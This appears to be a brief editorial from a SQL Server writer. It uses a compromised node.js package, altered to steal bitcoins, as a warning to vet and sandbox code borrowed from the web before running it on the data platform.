Many languages have libraries that are available for use, but most require that a developer download them, include them in their software and then publish the resulting software. In many node.js applications, the developer does some of this, but when they publish the application, the users pull down the versions of the packages that they need at that time. This allows developers to avoid including a lot of code in their applications, reducing file sizes, bandwidth, etc.
Recently an issue arose with a popular package that is included in many applications. I first noticed this on Twitter, then saw it called out in a Visual Studio User Group meeting and then even more online. A programmer made some helpful changes to the package and was given rights to make more by the maintainer. This user when altered the package to include some malware that would attempt to steal bitcoins from users that ran an application using the package.
This is much different than how our T-SQL code is structured, with all the code contained inside the database. There are some exceptions, but for the most part we can look at all the code that will be executed as a part of our batch. That doesn’t mean that we aren’t responsible for reviewing and checking out code.
Part of our duty as professionals is to be careful with code that we get from others, run it in a sandbox, test it, make sure this is code that will work well for us. Not many of us can download code from the web and have it run on our SQL Server without modification, but if we’re asking questions on a forum, we might just do that. If the problem is complex and the code is large, we might not pay enough attention. As SQL Server expands to get code in R, Python, Java, and more, we may need to be more diligent in scanning code to look for problems such as data leakage.
Can you imagine getting some Python code from the web that should break strings apart into works and find out that somewhere in the complex class structures this code also sends a copy of your data to some malicious website? I can, and it’s why I’d be very careful vetting code on the data platform.